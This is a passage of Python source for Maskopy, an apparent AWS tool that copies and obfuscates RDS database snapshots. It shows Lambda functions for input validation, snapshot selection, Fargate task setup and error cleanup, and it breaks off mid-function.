# Legacy function kept for reference; it is no longer called now that EC2-backed ECS tasks have been replaced by Fargate.
def check_ami_id(ami_id):
"""Function to validate AMI existence in account.
Args:
ami_id (str): AMI identifier to check for existence.
Raises:
MaskopyResourceNotFoundException: Raised if AMI is not found.
"""
print(f'Validating AmiId: {ami_id}')
ec2_client = boto3.client("ec2")
try:
ec2_client.describe_images(ImageIds=[ami_id])
print("AmiId validated.")
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(err)
raise MaskopyResourceNotFoundException("Please check your 'AmiId' input.")
def check_if_script_path_exists(obfuscation_script_path, engine, sql_script_list=None):
"""Function to check bootstrap.sh exists in obfuscation_script_path.
Args:
obfuscation_script_path (str): S3 bucket path to check.
engine (str): The engine of the RDS instance.
sql_script_list (str, optional): List of SQL files to check.
Raises:
MaskopyResourceException: Raised if S3 bucket cannot be accessed.
MaskopyResourceNotFoundException: Raised S3 bucket does not exist or
if path/'boot' prefix is not found in S3 path.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
print(f'Checking: {obfuscation_script_path}')
s3_bucket_name = obfuscation_script_path.split('/', 1)[0]
file_prefix = obfuscation_script_path.split('/', 1)[1] + '/boot'
s3_client = boto3.client('s3')
try:
if "oracle" in engine:
response = s3_client.list_objects_v2(Bucket=s3_bucket_name, Prefix=file_prefix)
if not response:
raise Exception("Please check your ObfuscationScriptPath input.")
# Check if S3 has any files that have the 'boot' prefix in the S3 path
if response.get("KeyCount") == 0:
print("Bootstrap script not found in S3 bucket. "
"Please check your ObfuscationScriptPath input.")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath input.")
for obj in response.get("Contents"):
script_name = obj.get("Key")
if not script_name:
print("Please check your ObfuscationScriptPath input")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath input.")
print(f'Found: {script_name}')
elif "postgres" in engine:
for file in sql_script_list.split(','):
print(f"Checking: {obfuscation_script_path.split('/', 1)[1]}/{file}")
if not file.endswith(".sql"):
raise Exception(f"Please check your sql_script_list input. "
f"{file} does not seem to be an sql file.")
file_prefix = f"{obfuscation_script_path.split('/', 1)[1]}/{file}"
response = s3_client.list_objects_v2(Bucket=s3_bucket_name, Prefix=file_prefix)
if not response:
raise Exception(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
# Check if S3 has the files in SqlScriptList
if response.get("KeyCount") == 0:
print(f"{file} not found in S3 bucket.")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
for obj in response.get("Contents"):
script_name = obj.get("Key")
if not script_name:
print("Please check your ObfuscationScriptPath and SqlScriptList input")
raise MaskopyResourceNotFoundException(
"Please check your ObfuscationScriptPath and SqlScriptList input.")
print(f'Found: {script_name}')
else:
print(f"Please check your engine type. {engine} is not supported.")
raise MaskopyResourceException(f"{engine} is not supported.")
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == "404":
print("The object does not exist.")
raise MaskopyResourceException("Please check your ObfuscationScriptPath input.")
def get_parameter_group(rds_client, rds_client_local, snapshot_identifier):
"""Function to get the original parameter group name of snapshot
Args:
rds_client (Client): AWS RDS Client object with source session.
rds_client_local (Client): AWS RDS Client object.
snapshot_identifier (str): The snapshot identifier.
Returns:
str: A parameter group attached to original RDS instance of snapshot.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)
rds_instance = rds_client.describe_db_instances(
DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])
parameter_group = (rds_instance['DBInstances'][0]
['DBParameterGroups'][0]
['DBParameterGroupName'])
        check_valid_parameter_group_instance(rds_client_local, parameter_group)
return parameter_group
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
if err.response['Error']['Code'] == 'DBInstanceNotFound':
print("Original RDS not available.")
print(err)
raise Exception("Parameter group not provided and cannot be extrapolated.")
def check_valid_parameter_group(rds_client, parameter_group_name, engine):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return check_valid_parameter_group_cluster(rds_client, parameter_group_name)
else:
return check_valid_parameter_group_instance(rds_client, parameter_group_name)
def check_valid_parameter_group_instance(rds_client, parameter_group_name):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
if not parameter_group_name:
raise MaskopyResourceNotFoundException("Please enter a valid RdsParameterGroup.")
print(f'Validating parameter group: {parameter_group_name}')
if not rds_client.describe_db_parameter_groups(
DBParameterGroupName=parameter_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsParameterGroup.")
print(f'Validated parameter group: {parameter_group_name}')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the parameter group: {err}')
raise
def check_valid_parameter_group_cluster(rds_client, parameter_group_name):
"""Function to check for valid parameter group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
parameter_group_name (str): The parameter group name.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
if not parameter_group_name:
raise MaskopyResourceNotFoundException("Please enter a valid RdsParameterGroup.")
print(f'Validating parameter group: {parameter_group_name}')
if not rds_client.describe_db_cluster_parameter_groups(
DBClusterParameterGroupName=parameter_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsParameterGroup.")
print(f'Validated parameter group: {parameter_group_name}')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the parameter group: {err}')
raise
def check_valid_option_group(rds_client, option_group_name):
"""Function to check for valid option group in destination environment.
Args:
rds_client (Client): AWS RDS Client object.
option_group_name (str): The option group name.
Returns:
:obj:`str`: The DB engine of the snapshot.
Raises:
MaskopyResourceNotFoundException: Exception raised if resource is not found.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Validating option group: {option_group_name}')
if not rds_client.describe_option_groups(
OptionGroupName=option_group_name):
raise MaskopyResourceNotFoundException("Please check your RdsOptionGroup.")
        print('Validated option group successfully.')
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'There was a problem checking the option group: {err}')
raise
def create_account_session(sts_client, role_arn, request_id):
"""Function to create and assume account role.
Args:
sts_client (Client): AWS STS Client object.
role_arn (str): The arn of the role to assume a session.
request_id (str): UUID for session to uniquely identify session name.
Returns:
:obj:`boto3.session.Session`:
A session of the role to be used.
"""
sts_response = sts_client.assume_role(
RoleArn=role_arn,
RoleSessionName=request_id
)
return boto3.session.Session(
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken']
)
def get_snapshot_from_rds(rds_client, rds_identifier, engine):
"""Return snapshot to use based off latest snapshot from an RDS instance"""
if 'aurora' in engine:
cluster_snapshots = get_db_snapshots_cluster(rds_client, rds_identifier)
return get_latest_snapshot_identifier(cluster_snapshots,engine)
else:
instance_snapshots = get_db_snapshots_instance(rds_client, rds_identifier)
return get_latest_snapshot_identifier(instance_snapshots,engine)
def get_db_snapshots_cluster(rds_client, cluster_identifier=None, snapshot_type=None, snapshot_identifier=None):
"""Return list of snapshots from an RDS cluster"""
describe_db_snapshot_params = {}
if cluster_identifier:
describe_db_snapshot_params['DBClusterIdentifier'] = cluster_identifier
    if snapshot_type:
        describe_db_snapshot_params['SnapshotType'] = snapshot_type
    if snapshot_identifier:
        describe_db_snapshot_params['DBClusterSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters: ')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBClusterSnapshots']
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBClusterSnapshots']
return snapshots
except ClientError as err:
raise MaskopyResourceException("Could not copy snapshot: %s" % err)
def get_db_snapshots_instance(rds_client, instance_identifier=None, snapshot_type=None, snapshot_identifier=None):
"""Return list of snapshots from an RDS cluster"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
        describe_db_snapshot_params['SnapshotType'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters: ')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBSnapshots']
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBSnapshots']
return snapshots
except ClientError as err:
raise MaskopyResourceException("Could not copy snapshot: %s" % err)
def get_latest_snapshot_identifier(snapshot_list, engine):
"""Return snapshot to use based off latest available snapshot from a list of snapshots"""
latest_date = None
latest_snapshot = ''
for snapshot in snapshot_list:
if not snapshot['Status'] == 'available':
continue
if latest_date is None or snapshot['SnapshotCreateTime'] > latest_date:
latest_date = snapshot['SnapshotCreateTime']
if 'aurora' in engine:
latest_snapshot = snapshot['DBClusterSnapshotIdentifier']
else:
latest_snapshot = snapshot['DBSnapshotIdentifier']
return latest_snapshot
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
class MaskopyResourceNotFoundException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource since the resource does not exist.
"""
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
```
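As a quick illustration of the snapshot-selection logic above, here is a self-contained sketch of `get_latest_snapshot_identifier` applied to an in-memory snapshot list (identifiers and dates are invented):

```python
from datetime import datetime

# Shaped like the entries returned by describe_db_snapshots for a non-Aurora engine.
snapshots = [
    {"Status": "available", "SnapshotCreateTime": datetime(2020, 1, 1),
     "DBSnapshotIdentifier": "myapp-snap-old"},
    {"Status": "creating", "SnapshotCreateTime": datetime(2020, 3, 1),
     "DBSnapshotIdentifier": "myapp-snap-in-progress"},
    {"Status": "available", "SnapshotCreateTime": datetime(2020, 2, 1),
     "DBSnapshotIdentifier": "myapp-snap-new"},
]

# Only 'available' snapshots are considered, so the in-progress snapshot is
# skipped and the newest available one wins:
# get_latest_snapshot_identifier(snapshots, "oracle-ee") -> "myapp-snap-new"
```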
#### File: lambda/09a-CreateFargate/index.py
```python
import os
import time
import boto3
from botocore.exceptions import ClientError
ECS_CLIENT = boto3.client('ecs')
def lambda_handler(event, context):
"""Lambda handler for the ninth lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
(dict of str:str) Dictionary containing cluster and task definition names.
"""
application_name = event['ApplicationName']
timestamp = event.get('ExecutionTimestamp') or str(int(time.time()))
cluster_name = 'MASKOPY-FARGATE-CLUSTER'
task_definition_name = f'maskopy-{application_name}-{timestamp}'
task_definition_environment = [
{
'name': 'APPLICATION_NAME',
'value': application_name
},
{
'name': 'OBFUSCATION_SCRIPT_PATH',
'value': event['ObfuscationScriptPath']
},
{
'name': 'RDS_INSTANCE_IDENTIFIER',
'value': event['DestinationRestoredDatabases'][0]['DBIdentifier']['DBInstanceIdentifier']
},
{
'name': 'TIMESTAMP',
'value': timestamp
},
{
'name': 'ENGINE',
'value': event['CreatedSnapshots'][0]['Engine']
},
{
'name': 'SQL_SCRIPTS',
'value': event.get('SqlScriptList') or ''
},
{
'name': 'DB_NAME',
'value': event.get('DbName') or ''
},
{
'name': 'APP_NAME',
'value': 'springboot'
}
]
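    # The entries above are injected into the container as environment variables;
    # the bootstrap/obfuscation script launched by the task is expected to read them.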
create_cluster(cluster_name)
create_log_group()
task_definition_revision = create_task_definition(
task_definition_name,
task_definition_environment,
event.get("TaskDefinitionCPU"),
event.get("TaskDefinitionMemory"),
event.get("CustomTaskImage")
)
return ({
"ClusterName": cluster_name,
"PlatformVersion": "1.4.0",
"TaskDefinition": task_definition_name + ':' + task_definition_revision
})
def create_cluster(cluster_name):
"""Function to create a cluster with cluster_name.
Args:
cluster_name (str): The name of the cluster to create.
Returns:
str: Returns the cluster name created.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
print(f'Cluster name is: {cluster_name}. Checking if it exists')
response = ECS_CLIENT.describe_clusters(clusters=[
cluster_name,
])
if not response.get('clusters') or response.get('clusters')[0]['status'] == 'INACTIVE':
print(f'Cluster does not exist. Creating Fargate cluster: {cluster_name}')
response = ECS_CLIENT.create_cluster(
clusterName=cluster_name
)
else:
print('Cluster already exists.')
return response
except ClientError as err:
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f'Failed to create Fargate cluster with error: {err}')
raise MaskopyResourceException(f'Failed to create Fargate cluster: {err}')
def create_log_group():
"""Function to create the log group for the task definition.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
log_client = boto3.client("logs")
try:
log_response = log_client.describe_log_groups(
logGroupNamePrefix="/ecs/maskopy/bootstrap-logs")
if not log_response.get('logGroups'):
print('Creating log group: /ecs/maskopy/bootstrap-logs')
log_client.create_log_group(logGroupName="/ecs/maskopy/bootstrap-logs")
else:
print('/ecs/maskopy/bootstrap-logs log group already exists. Skipping creation.')
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print('Failed to create log group with error: ' + str(err))
raise MaskopyResourceException(f"Failed to create log group: {err}")
def create_task_definition(task_definition_name, task_definition_environment, cpu, memory, image=None):
"""Function to create a task definition.
Args:
task_definition_name (str): The name of the cluster to create.
task_definition_environment (:obj:`list` of :obj:`dict`):
A list of dicts that contain the environment variables for task.
image (str, optional): The name of the custom image to be used in task.
cpu (str): Cpu variable for task definition
memory (str): Memory Variable for task defintion
Returns:
str: Returns the revision number of the task created.
Raises:
MaskopyResourceException: Raised if resource cannot be accessed
or if the execution role does not have permissions to create resource.
"""
account_id = os.environ['account_id']
default_image = os.environ['default_image']
service_role = os.environ['service_role']
region = os.environ['region']
try:
# Task definition name has a limit of 255 characters.
print(f'Registering Task Definition: {task_definition_name[:255]}')
response = ECS_CLIENT.register_task_definition(
containerDefinitions=[
{
'name': task_definition_name[:255],
'image': image or default_image,
'essential': True,
'memory': 1024,
'cpu': 80,
'logConfiguration': {
'logDriver': 'awslogs',
'options': {
'awslogs-group': '/ecs/maskopy/bootstrap-logs',
'awslogs-region': region,
'awslogs-stream-prefix': 'ecs'
}
},
'environment': task_definition_environment,
'command': [
'/tmp/config-bootstrap.sh'
],
'workingDirectory': '/',
}
],
family=task_definition_name[:255],
executionRoleArn=f'arn:aws:iam::{account_id}:role/{service_role}',
taskRoleArn=f'arn:aws:iam::{account_id}:role/{service_role}',
networkMode="awsvpc",
requiresCompatibilities=["FARGATE"],
memory=memory or "2048",
cpu=cpu or "1024"
)
print(response)
return str(response['taskDefinition']['revision'])
except ClientError as err:
print(f'Failed to register Task Definition with error: {err}')
        raise MaskopyResourceException(f'Failed to register Task Definition: {err}')
class MaskopyResourceException(Exception):
"""Exception raised when IAM role or user is not able to access the
resource.
"""
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
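The dictionary returned by this lambda is presumably consumed by a later state that actually launches the Fargate task. A minimal sketch of such a call is shown below; the task definition name, subnet, and security group IDs are placeholders, and the exact invocation used by the state machine may differ:

```python
import boto3

ecs_client = boto3.client('ecs')

created = {
    "ClusterName": "MASKOPY-FARGATE-CLUSTER",
    "PlatformVersion": "1.4.0",
    "TaskDefinition": "maskopy-myapp-1580000000:1",  # hypothetical name:revision
}

response = ecs_client.run_task(
    cluster=created["ClusterName"],
    launchType="FARGATE",
    platformVersion=created["PlatformVersion"],
    taskDefinition=created["TaskDefinition"],
    networkConfiguration={
        "awsvpcConfiguration": {
            "subnets": ["subnet-00000000"],         # placeholder
            "securityGroups": ["sg-00000000"],      # placeholder
            "assignPublicIp": "DISABLED",
        }
    },
)
print(response["tasks"][0]["taskArn"])
```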
#### File: lambda/11-CheckFinalSnapshotAvailability/index.py
```python
import json
import boto3
from botocore.exceptions import ClientError
def lambda_handler(event, context):
"""Lambda handler for the eleventh lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
bool: True if final snapshots are in available state, False otherwise.
"""
completed_snapshots = []
engine=event['CreatedSnapshots'][0]['Engine']
rds_client = boto3.client("rds")
# Check availability state of the snapshots in the list of created snapshots
for snapshot in event['CreatedFinalSnapshots']:
snapshot_info = get_db_snapshots(
rds_client, engine, None, None, snapshot['SnapshotName'])
for info in snapshot_info:
if info['Status'] == 'available':
completed_snapshots.append('snapshot')
if len(completed_snapshots) == len(event['CreatedFinalSnapshots']):
return True
return False
def get_db_snapshots(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return get_db_snapshots_cluster(rds_client,engine,None,None,snapshot_identifier)
else:
return get_db_snapshots_instance(rds_client,engine,None,None,snapshot_identifier)
def get_db_snapshots_cluster(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
engine: The DB engine of the snapshot
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
describe_db_snapshot_params['SnapshotType'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBClusterSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB cluster snapshots with the following parameters:')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_cluster_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBClusterSnapshots']
# Paginate the rds response, if required.
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
            snapshot_response = rds_client.describe_db_cluster_snapshots(
                **describe_db_snapshot_params)
            snapshots = snapshots + snapshot_response['DBClusterSnapshots']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get DB Cluster Snapshots: {err}")
raise
return snapshots
def get_db_snapshots_instance(rds_client, engine, instance_identifier=None,
snapshot_type=None, snapshot_identifier=None):
"""Function to query snapshots to check if snapshots are in available status
Args:
rds_client (Client): AWS RDS Client object.
engine: The DB engine of the snapshot
instance_identifier (str, optional): RDS instance identifier string.
If specified, will list all snapshots belonging to this instance.
snapshot_type (str, optional): RDS snapshot type.
Required if snapshot is an automated snapshot.
snapshot_identifier (str, optional): RDS snapshot identifer.
Cannot be used in conjunction with instance_identifier.
Returns:
:obj:`list` of :obj:`dict`: A list of snapshots.
None if no snapshots exist with specified parameters.
Raises:
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
describe_db_snapshot_params = {}
if instance_identifier:
describe_db_snapshot_params['DBInstanceIdentifier'] = instance_identifier
if snapshot_type:
describe_db_snapshot_params['SnapshotType'] = snapshot_type
if snapshot_identifier:
describe_db_snapshot_params['DBSnapshotIdentifier'] = snapshot_identifier
try:
print('Getting DB snapshots with the following parameters:')
print(json.dumps(describe_db_snapshot_params))
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshot_response['DBSnapshots']
# Paginate the rds response, if required.
while 'Marker' in snapshot_response:
describe_db_snapshot_params['Marker'] = snapshot_response['Marker']
snapshot_response = rds_client.describe_db_snapshots(
**describe_db_snapshot_params)
snapshots = snapshots + snapshot_response['DBSnapshots']
except ClientError as err:
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print("Throttling occurring.")
raise MaskopyThrottlingException(err)
print(f"Failed to get DB Snapshots: {err}")
raise
return snapshots
class MaskopyThrottlingException(Exception):
"""Exception raised when AWS request returns a Throttling exception.
"""
```
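For context, here is a sketch of the event shape this availability check expects (all identifiers are placeholders); the boolean it returns is what lets the surrounding state machine keep polling until every final snapshot is available:

```python
# Hypothetical input event for 11-CheckFinalSnapshotAvailability.
event = {
    "CreatedSnapshots": [
        {"SnapshotName": "myapp-source-snap", "Engine": "aurora-postgresql"}
    ],
    "CreatedFinalSnapshots": [
        {"SnapshotName": "myapp-final-snap"}
    ],
}
# lambda_handler(event, context) returns True only once every snapshot listed in
# CreatedFinalSnapshots reports Status == 'available'; otherwise it returns False
# and the state machine is expected to wait and retry.
```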
#### File: lambda/ErrorHandlingAndCleanup/index.py
```python
import json
import os
import time
import boto3
from botocore.exceptions import ClientError
ASG_CLIENT = boto3.client('autoscaling')
ECS_CLIENT = boto3.client('ecs')
RDS_CLIENT = boto3.client('rds')
STS_CLIENT = boto3.client('sts')
ASSUME_ROLE_ARN = os.environ['assume_role_arn']
def lambda_handler(event, context):
"""Lambda handler for the eleventh lambda of the Maskopy process.
Args:
event (dict): AWS Lambda uses this parameter to pass in event data to the handler.
context (Context): AWS Lambda provides runtime info and meta data.
Returns:
:obj:`list` of :obj`dict` of str:str:
List of deleted resources and message to be sent to SQS.
"""
deleted_resources = []
# Create message to be sent to SQS
json_msg = {
"ApplicationName": event['ApplicationName'],
"State": "CRITICAL",
"SDLC": event['DestinationEnv'],
"Service": "MasKopy",
"msgDetail": (f"MasKopy process for ApplicationName: {event['ApplicationName']} "
f"for snapshotID: {event['RdsSnapshotIdentifier']}. "
f"The status is: CRITICAL.")
}
deleted_resources.append({'Message' : json.dumps(json_msg)})
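    # The serialized message above is returned alongside the deleted resources;
    # a downstream step outside this lambda is presumably responsible for
    # publishing it to SQS, as described in the docstring.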
session = create_account_session(
STS_CLIENT, ASSUME_ROLE_ARN, context.aws_request_id)
rds_source_client = session.client('rds')
for shared_snapshot in event.get('CreatedSnapshots', []):
if isinstance(shared_snapshot, dict):
snapshot_name = shared_snapshot.get('SnapshotName')
print(f"Deleting snapshot in source account: {snapshot_name}")
if delete_snapshot(rds_source_client, snapshot_name,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({'SourceSnapshot' : snapshot_name})
for destination_snapshot in event.get('CreatedDestinationSnapshots', []):
if isinstance(destination_snapshot, dict):
snapshot_name = destination_snapshot.get('SnapshotName')
print(f"Deleting snapshots in destination account: {snapshot_name}")
if delete_snapshot(RDS_CLIENT, snapshot_name,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({'DestinationSnapshot': snapshot_name})
for database in event.get('DestinationRestoredDatabases', []):
if 'DBIdentifier' in database and database['DBIdentifier']['DBInstanceIdentifier'].startswith('maskopy'):
print(f"Deleting RDS in destination account: {database['DBIdentifier']['DBInstanceIdentifier']}")
if delete_database(RDS_CLIENT, database,event["CreatedSnapshots"][0]["Engine"]):
deleted_resources.append({"DestinationDatabase": database['DBIdentifier']})
if event.get('ObfuscateRunMode') == 'ecs':
ecs = event.get('ecs')
if ecs:
if (ecs.get('InstanceId') and ecs.get('AsgName') and
delete_asg(ASG_CLIENT, ecs['AsgName'])):
deleted_resources.append({"Instance": ecs['InstanceId']})
deleted_resources.append({"ASG": ecs['AsgName']})
if (ecs.get('TaskDefinition') and
deregister_task_definition(ECS_CLIENT, ecs['TaskDefinition'])):
deleted_resources.append({"Task Definition": ecs['TaskDefinition']})
if (ecs.get('ClusterName') and
delete_cluster(ECS_CLIENT, ecs.get('ClusterName'), ecs.get('InstanceId'))):
deleted_resources.append({"ECS Cluster": ecs['ClusterName']})
elif not event.get('ObfuscateRunMode') or event.get('ObfuscateRunMode') == 'fargate':
fargate = event.get('fargate')
if (fargate and fargate.get('TaskDefinition') and
deregister_task_definition(ECS_CLIENT, fargate.get('TaskDefinition'))):
deleted_resources.append({"Task Definition": fargate.get('TaskDefinition')})
return deleted_resources
def delete_snapshot(rds_client, snapshot_identifier, engine):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
engine: The DB engine of the snapshot
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return delete_snapshot_cluster(rds_client, snapshot_identifier)
else:
return delete_snapshot_instance(rds_client, snapshot_identifier)
def delete_snapshot_cluster(rds_client, snapshot_identifier):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
rds_client.delete_db_cluster_snapshot(
DBClusterSnapshotIdentifier=snapshot_identifier)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBClusterSnapshotNotFound':
print(f'Snapshot, {snapshot_identifier}, already deleted.')
return True
# Check if error code is due to SNAPSHOT not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBClusterSnapshotState':
print(f"{snapshot_identifier}: RDS snapshot is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting snapshot: {snapshot_identifier}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting snapshot, {snapshot_identifier}: {err.response['Error']['Code']}.")
print(err)
return False
def delete_snapshot_instance(rds_client, snapshot_identifier):
"""Function to delete snapshot.
Args:
rds_client (Client): AWS RDS Client object.
snapshot_identifier (str): RDS snapshot identifer to delete
Returns:
bool: True if snapshot was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
try:
rds_client.delete_db_snapshot(
DBSnapshotIdentifier=snapshot_identifier)
return True
except ClientError as err:
# Check if error code is DBSnapshotNotFound. If so, ignore the error.
if err.response['Error']['Code'] == 'DBSnapshotNotFound':
print(f'Snapshot, {snapshot_identifier}, already deleted.')
return True
# Check if error code is due to SNAPSHOT not being in an available state.
if err.response['Error']['Code'] == 'InvalidDBSnapshotState':
print(f"{snapshot_identifier}: RDS snapshot is not in available state.")
raise MaskopyResourceException(err)
# Check if error code is due to throttling.
if err.response['Error']['Code'] == 'Throttling':
print(f"Throttling occurred when deleting snapshot: {snapshot_identifier}.")
raise MaskopyThrottlingException(err)
print(f"Error deleting snapshot, {snapshot_identifier}: {err.response['Error']['Code']}.")
print(err)
return False
def delete_database(rds_client, db_identifier, engine):
"""Function to delete RDS instance.
Args:
rds_client (Client): AWS RDS Client object.
        db_identifier (dict): Entry containing the 'DBIdentifier' of the RDS instance or cluster to delete
engine: The DB engine of the snapshot
Returns:
bool: True if instance was deleted successfully or does not exist,
False otherwise.
Raises:
MaskopyResourceException: Exception used when trying to access a resource
that cannot be accessed.
MaskopyThrottlingException: Exception used to catch throttling from AWS.
Used to implement a back off strategy.
"""
if 'aurora' in engine:
return delete_database_cluster(rds_client, db_identifier['DBIdentifier'])
else:
